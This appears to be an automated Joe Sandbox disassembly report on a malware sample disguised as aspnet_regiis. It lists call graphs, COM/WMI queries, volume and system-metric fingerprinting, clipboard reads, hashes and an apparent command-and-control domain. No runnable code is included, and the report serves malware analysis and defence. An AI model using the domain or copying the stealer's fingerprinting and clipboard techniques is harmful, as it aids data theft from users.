LdrInitializeThunk 6193->6196 6196->6194 6388 278a31d 6389 278a332 6388->6389 6390 278b0d0 RtlFreeHeap 6389->6390 6391 278a33b 6390->6391 6034 278d39e CoInitializeSecurity 6040 278b0d0 6043 278b100 6040->6043 6041 278b5d2 6043->6041 6043->6043 6044 27bcfa0 6043->6044 6045 27bcfb9 RtlFreeHeap 6044->6045 6046 27bcfb5 6044->6046 6045->6041 6046->6041 6048 278d3d0 6049 278d3e0 6048->6049 6052 27ba710 6049->6052 6051 278d437 6054 27ba770 CoCreateInstance 6052->6054 6055 27ba82f SysAllocString 6054->6055 6056 27bad5e 6054->6056 6059 27ba8ea 6055->6059 6057 27bad6e GetVolumeInformationW 6056->6057 6066 27bad85 6057->6066 6060 27bad4d SysFreeString 6059->6060 6061 27ba8f6 CoSetProxyBlanket 6059->6061 6060->6056 6062 27bad43 6061->6062 6063 27ba916 SysAllocString 6061->6063 6062->6060 6065 27ba9e0 6063->6065 6065->6065 6067 27baa12 SysAllocString 6065->6067 6066->6051 6070 27baa35 6067->6070 6068 27bad2d SysFreeString SysFreeString 6068->6062 6069 27bad1f 6069->6068 6070->6068 6070->6069 6071 27baa79 VariantInit 6070->6071 6073 27baad0 6071->6073 6072 27bad0e VariantClear 6072->6069 6073->6072 6133 2799450 6134 2799480 6133->6134 6134->6134 6141 27bd290 6134->6141 6137 27bcfa0 RtlFreeHeap 6139 2799502 6137->6139 6139->6137 6139->6139 6140 27bfac0 LdrInitializeThunk 6139->6140 6145 27bd490 6139->6145 6153 27bd3e0 6139->6153 6140->6139 6142 27bd35e 6141->6142 6143 27bd2a2 6141->6143 6142->6139 6143->6142 6157 27bfac0 LdrInitializeThunk 6143->6157 6146 27bd523 6145->6146 6147 27bd4a6 6145->6147 6146->6139 6147->6146 6148 27bd51e 6147->6148 6158 27bfac0 LdrInitializeThunk 6147->6158 6149 27bd66e 6148->6149 6159 27bfac0 LdrInitializeThunk 6148->6159 6149->6146 6160 27bfac0 LdrInitializeThunk 6149->6160 6154 27bd45e 6153->6154 6155 27bd3ea 6153->6155 6154->6139 6155->6154 6161 27bfac0 LdrInitializeThunk 6155->6161 6157->6142 6158->6148 6159->6149 6160->6146 6161->6154 6430 2798590 6431 27bd000 2 API calls 6430->6431 6432 27985b8 6431->6432 6197 278e013 6198 278e030 6197->6198 6200 278e07e 6198->6200 6201 27bfac0 LdrInitializeThunk 6198->6201 6201->6200 6162 27c1e50 6164 27c1e70 6162->6164 6163 27c1f8e 6164->6163 6166 27bfac0 LdrInitializeThunk 6164->6166 6166->6163 6392 278db08 6397 27b50d0 6392->6397 6398 27b5105 GetSystemMetrics GetSystemMetrics 6397->6398 6399 27b5148 6398->6399 6350 279a08d 6351 279a09b 6350->6351 6351->6351 6352 2788bf0 ExitProcess 6351->6352 6354 279a1e4 6352->6354 6353 279a2ce 6354->6353 6356 27bfac0 LdrInitializeThunk 6354->6356 6356->6353 6202 278ee0e GetSystemDirectoryW GetSystemDirectoryW 6203 278ee58 6202->6203 6400 278ab0e 6401 278ac40 6400->6401 6401->6401 6402 278b5f0 RtlFreeHeap 6401->6402 6403 278ac91 6402->6403 6404 278b5f0 RtlFreeHeap 6403->6404 6405 278ae1b 6404->6405 6079 2788cc0 6080 2788ccf 6079->6080 6081 2788e38 ExitProcess 6080->6081 6082 2788cd7 SHGetSpecialFolderPathW 6080->6082 6083 2788ced 6082->6083 6084 2788e33 6083->6084 6085 2788cf5 GetCurrentThreadId GetCurrentProcessId 6083->6085 6094 27bf9e0 6084->6094 6087 2788d2a GetForegroundWindow 6085->6087 6088 2788d26 6085->6088 6089 2788dcb 6087->6089 6088->6087 6089->6084 6093 278d360 CoInitializeEx 6089->6093 6097 27c1170 6094->6097 6096 27bf9e5 FreeLibrary 6096->6081 6098 27c1179 6097->6098 6098->6096 6376 278d340 GetPixel 6433 2799180 6434 279918d 6433->6434 6434->6434 6435 27c2190 LdrInitializeThunk 6434->6435 6436 27992d3 6435->6436 6437 27c2190 LdrInitializeThunk 6436->6437 6438 2799404 6437->6438 6265 27a18c0 6266 27a1938 6265->6266 6275 2798940 6266->6275 6268 27a19d1 6269 2798940 2 API calls 6268->6269 6270 27a1ad4 6269->6270 6271 2798940 2 API calls 6270->6271 6272 27a1c87 6271->6272 6273 2798940 2 API calls 6272->6273 6274 27a1df9 6273->6274 6276 2798960 6275->6276 6276->6276 6277 27c1ff0 LdrInitializeThunk 6276->6277 6282 2798a2a 6277->6282 6278 2798df2 6279 2798e2e 6278->6279 6281 2798e1b 6278->6281 6283 2798e0b 6278->6283 6284 2798e47 6278->6284 6287 2798d2c 6278->6287 6292 2798b29 6278->6292 6311 27c2310 6279->6311 6280 2798de2 6289 27bae50 2 API calls 6280->6289 6291 27c1ff0 LdrInitializeThunk 6281->6291 6282->6278 6282->6279 6282->6280 6282->6281 6282->6283 6282->6284 6282->6287 6282->6292 6297 27bae50 6282->6297 6290 27c1ff0 LdrInitializeThunk 6283->6290 6286 27c2310 LdrInitializeThunk 6284->6286 6293 2798e5a 6286->6293 6287->6268 6289->6278 6290->6281 6291->6279 6292->6279 6292->6284 6292->6287 6294 27c23d0 LdrInitializeThunk 6292->6294 6296 27bfac0 LdrInitializeThunk 6292->6296 6294->6292 6296->6292 6298 27c1ff0 LdrInitializeThunk 6297->6298 6306 27bae6e 6298->6306 6299 27bafb7 6303 27bcfa0 RtlFreeHeap 6299->6303 6300 27bd3e0 LdrInitializeThunk 6301 27baf8e 6300->6301 6301->6299 6301->6300 6302 27bd490 LdrInitializeThunk 6301->6302 6304 27bd290 LdrInitializeThunk 6301->6304 6305 27bb4d7 6301->6305 6302->6301 6308 27bafbd 6303->6308 6304->6301 6306->6299 6306->6301 6307 27bae7d 6306->6307 6316 27bfac0 LdrInitializeThunk 6306->6316 6307->6280 6308->6307 6315 27bfac0 LdrInitializeThunk 6308->6315 6313 27c2340 6311->6313 6312 27c237e 6312->6284 6313->6312 6317 27bfac0 LdrInitializeThunk 6313->6317 6315->6307 6316->6301 6317->6312 6418 278c5c2 6421 27bfa00 6418->6421 6420 278c5cf 6422 27bfa1a 6421->6422 6423 27bfa28 6421->6423 6422->6423 6424 27bcfa0 RtlFreeHeap 6422->6424 6423->6420 6424->6423 6099 27bcf80 RtlAllocateHeap 6357 2799882 6358 279988f 6357->6358 6360 27c2190 LdrInitializeThunk 6358->6360 6362 2799bcf 6358->6362 6359 2799f6b 6359->6359 6360->6362 6361 27c2190 LdrInitializeThunk 6361->6359 6362->6359 6362->6361 6362->6362 6167 279a046 6168 279a054 6167->6168 6169 27bd3e0 LdrInitializeThunk 6168->6169 6170 279b5a0 6169->6170 6170->6170

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 27ba710-27ba76e 1 27ba770-27ba7b7 0->1 1->1 2 27ba7b9-27ba7d4 1->2 4 27ba7de-27ba829 CoCreateInstance 2->4 5 27ba7d6 2->5 6 27ba82f-27ba86b 4->6 7 27bad5e-27bad83 call 27c1670 GetVolumeInformationW 4->7 5->4 9 27ba870-27ba8bf 6->9 12 27bad8d-27bad8f 7->12 13 27bad85-27bad89 7->13 9->9 11 27ba8c1-27ba8f0 SysAllocString 9->11 16 27bad4d-27bad5a SysFreeString 11->16 17 27ba8f6-27ba910 CoSetProxyBlanket 11->17 14 27badaf-27badb6 12->14 13->12 18 27badb8-27badbf 14->18 19 27badc2-27bae0f call 27a0430 14->19 16->7 20 27bad43-27bad49 17->20 21 27ba916-27ba938 17->21 18->19 26 27bae10-27bae1b 19->26 20->16 23 27ba940-27ba954 21->23 23->23 25 27ba956-27ba9d2 SysAllocString 23->25 28 27ba9e0-27baa10 25->28 26->26 27 27bae1d-27bae29 26->27 29 27bae2f-27bae3f call 2788560 27->29 30 27bada0-27bada9 27->30 28->28 31 27baa12-27baa37 SysAllocString 28->31 29->30 30->14 33 27bae44-27bae4b 30->33 36 27bad2d-27bad3f SysFreeString * 2 31->36 37 27baa3d-27baa5f 31->37 36->20 39 27bad23-27bad29 37->39 40 27baa65-27baa68 37->40 39->36 40->39 41 27baa6e-27baa73 40->41 41->39 42 27baa79-27baacf VariantInit 41->42 43 27baad0-27baaf0 42->43 43->43 44 27baaf2-27bab07 43->44 45 27bab0b-27bab11 44->45 46 27bad0e-27bad1f VariantClear 45->46 47 27bab17-27bab20 45->47 46->39 47->46 48 27bab26-27bab33 47->48 49 27bab6d 48->49 50 27bab35-27bab3a 48->50 53 27bab6f-27bab93 call 27884e0 49->53 52 27bab4c-27bab50 50->52 54 27bab52-27bab5b 52->54 55 27bab40 52->55 61 27bacaa-27bacca 53->61 62 27bab99-27baba3 53->62 58 27bab5d-27bab60 54->58 59 27bab62-27bab66 54->59 57 27bab41-27bab4a 55->57 57->52 57->53 58->57 59->57 63 27bab68-27bab6b 59->63 65 27bacfa-27bad07 call 27884f0 61->65 66 27baccc-27bace2 61->66 62->61 64 27baba9-27babaf 62->64 63->57 67 27babb0-27babba 64->67 65->46 66->65 68 27bace4-27bacf1 66->68 70 27babbc-27babc1 67->70 71 27babd0-27babd5 67->71 68->65 72 27bacf3-27bacf6 68->72 74 27bac50-27bac56 70->74 75 27babd7-27babda 71->75 76 27babf6-27bac04 71->76 72->65 80 27bac58-27bac5e 74->80 75->76 77 27babdc-27babf4 75->77 78 27bac6a-27bac73 76->78 79 27bac06-27bac09 76->79 77->74 83 27bac79-27bac7c 78->83 84 27bac75-27bac77 78->84 79->78 81 27bac0b-27bac4f 79->81 80->61 82 27bac60-27bac62 80->82 81->74 82->67 87 27bac68 82->87 85 27bac7e-27baca4 83->85 86 27baca6-27baca8 83->86 84->80 85->74 86->74 87->61
                                                APIs
                                                • CoCreateInstance.OLE32(027C5678,00000000,00000001,027C5668,00000000), ref: 027BA821
                                                • SysAllocString.OLEAUT32(71BF0FBE), ref: 027BA8C6
                                                • CoSetProxyBlanket.COMBASE(00006360,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 027BA908
                                                • SysAllocString.OLEAUT32(71BF0FBE), ref: 027BA957
                                                • SysAllocString.OLEAUT32(71BF0FBE), ref: 027BAA13
                                                • VariantInit.OLEAUT32(?), ref: 027BAA81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                • String ID: 3{5}$6C%E$>O5A$@7QI$C$\$`c$cGFY$/.-$h~i
                                                • API String ID: 65563702-3830209669
                                                • Opcode ID: 41fccf851292d4dab630790be11d9ecbe7c1aac9c13b9277f6076024cd4723ff
                                                • Instruction ID: e98528859a09f6d012024cd69f6a8597a9764be63bcf51d9b73d45494654a69e
                                                • Opcode Fuzzy Hash: 41fccf851292d4dab630790be11d9ecbe7c1aac9c13b9277f6076024cd4723ff
                                                • Instruction Fuzzy Hash: BA121171A483019FD720DF25C8857ABFBE1EF85304F148A2CF995AB291D774E905CB92

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 235 27bfac0-27bfaf2 LdrInitializeThunk
                                                APIs
                                                • LdrInitializeThunk.NTDLL(02797A82), ref: 027BFAEE
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                Control-flow Graph

                                                APIs
                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02788CE2
                                                • GetCurrentThreadId.KERNEL32 ref: 02788CF5
                                                • GetCurrentProcessId.KERNEL32 ref: 02788CFD
                                                • GetForegroundWindow.USER32 ref: 02788DC1
                                                • ExitProcess.KERNEL32 ref: 02788E3A
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                • String ID:
                                                • API String ID: 4063528623-0
                                                • Opcode ID: 4afdcb485ea7ccc5683152c5c5c3eee8aa9dcd7fc291b0b85b447461c405d1fc
                                                • Instruction ID: 210cdda4b5f2c276781b6b535f46ebb4d501149272f4762014979d8ddb744652
                                                • Opcode Fuzzy Hash: 4afdcb485ea7ccc5683152c5c5c3eee8aa9dcd7fc291b0b85b447461c405d1fc
                                                • Instruction Fuzzy Hash: 8F316B33F8031917C72C7975DC8E399B5975BC4610F0E853DAC859B3D6EE746C0A8691

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 228 27bcfa0-27bcfae 229 27bcfb9-27bcfca 228->229 230 27bcfb5-27bcfb8 228->230 231 27bcfd0-27bcfe2 229->231 231->231 232 27bcfe4-27bcff9 RtlFreeHeap 231->232
                                                APIs
                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 027BCFF0
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: da55ecfec5584e092f6af6fc146d1aea69f2f325d9f2b71c2084767ffeae057c
                                                • Instruction ID: 7ad313025bfc9baa6b142f1de7459c6450472646676bd3d4fb1b194e4ddc95c6
                                                • Opcode Fuzzy Hash: da55ecfec5584e092f6af6fc146d1aea69f2f325d9f2b71c2084767ffeae057c
                                                • Instruction Fuzzy Hash: 30F0EC305483008FD7095F34EC6272EBBA1EF86715F90457CE5C546691DA39483ACF02

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 233 278d360-278d397 CoInitializeEx
                                                APIs
                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0278D373
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 56ffd5d0cf269f5a68561b62e9079c7837fabcefc88dac91412ed531cee59c9d
                                                • Instruction ID: da6ed3a27163a30fa9d691d33f276ea6d2d99e3af994c97aef913cde253047f2
                                                • Opcode Fuzzy Hash: 56ffd5d0cf269f5a68561b62e9079c7837fabcefc88dac91412ed531cee59c9d
                                                • Instruction Fuzzy Hash: BFE0C231FD02046BE3045569EC0BF963AAA8786721F58C62CA151C63C5D97968218166

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 234 278d39e-278d3cd CoInitializeSecurity
                                                APIs
                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0278D3B0
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: InitializeSecurity
                                                • String ID:
                                                • API String ID: 640775948-0
                                                • Opcode ID: a9bb9766e643d4c6c1594be2c372861b6a788fa3f19cf6204d0751ae62d3bd49
                                                • Instruction ID: 3a0a94a3887ee938ceda9ef5640b85bc4be74549e28cae6b95f561392fba1c67
                                                • Opcode Fuzzy Hash: a9bb9766e643d4c6c1594be2c372861b6a788fa3f19cf6204d0751ae62d3bd49
                                                • Instruction Fuzzy Hash: F7D0C9307D434177F1A54629AC57F203251A301F25F708A0CB762FE3C0C9F07121861D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 236 27bcf80-27bcf84 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 027BCF84
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 82a6ac2cf49c24c9aea24ae764d0a584d8ca154dc1e30e0777cd8c67e163661b
                                                • Instruction ID: ada2f6ac8acb7886c745effbbfa4aadd9cb1204fc09254af0feb0fb9a55d86d4
                                                • Opcode Fuzzy Hash: 82a6ac2cf49c24c9aea24ae764d0a584d8ca154dc1e30e0777cd8c67e163661b
                                                • Instruction Fuzzy Hash: 0BA024344C1110D7C3140F105C4DF577D3CF701F41F144404F4004004043701010CD10

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 243 278eaf0-278eafc call 2781bb0 CoUninitialize
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: Uninitialize
                                                • String ID:
                                                • API String ID: 3861434553-0
                                                • Opcode ID: 5dd4f40cf7cee78710d1763f0a0217dc801c2f83d6e9d11e3aad67b940b3ab4c
                                                • Instruction ID: ae24918b00c2b326a1527d3c41f3bdd4f8b2dd9dde257c842ce313577df19ec8
                                                • Opcode Fuzzy Hash: 5dd4f40cf7cee78710d1763f0a0217dc801c2f83d6e9d11e3aad67b940b3ab4c
                                                • Instruction Fuzzy Hash: 93B012708841018BC3057B31BC0E01939325F40702B400424D80630490F63258648D13
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                • String ID: 3$?$e
                                                • API String ID: 2832541153-3975470078
                                                • Opcode ID: 088e1c6e78a21d9a6e5ca08e70f8eba0c961a49c6f77eb8f9d9754445ec61dcc
                                                • Instruction ID: 18406e6f9ff577e3342b6cd1f13a7d53552f14b3f4d6df366e23d5a7c52a3b3b
                                                • Opcode Fuzzy Hash: 088e1c6e78a21d9a6e5ca08e70f8eba0c961a49c6f77eb8f9d9754445ec61dcc
                                                • Instruction Fuzzy Hash: 3441B07250C7818FD316AF3C948836EBFE0AF81224F484A3CE5E6962C2D6758549C7A3
                                                APIs
                                                  • Part of subcall function 027B50D0: GetSystemMetrics.USER32 ref: 027B5119
                                                  • Part of subcall function 027B50D0: GetSystemMetrics.USER32 ref: 027B5129
                                                • CoUninitialize.OLE32 ref: 0278DB1D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: MetricsSystem$Uninitialize
                                                • String ID: F$N967$property-imper.sbs$uy
                                                • API String ID: 1128523136-3187881583
                                                • Opcode ID: 87aa934849bace04d60bff2143bff94c7cf7b4d4d27097365c93cf1d7e5a91c5
                                                • Instruction ID: 1eb4d30eb4c97001d59ada18ac2dba7f596201541c251a0e4ef267df55fe6b45
                                                • Opcode Fuzzy Hash: 87aa934849bace04d60bff2143bff94c7cf7b4d4d27097365c93cf1d7e5a91c5
                                                • Instruction Fuzzy Hash: D2A1CFB014C3D18BD7369F259494BEBBFE0AB97304F1449ADD0D98B282E7784149CBA7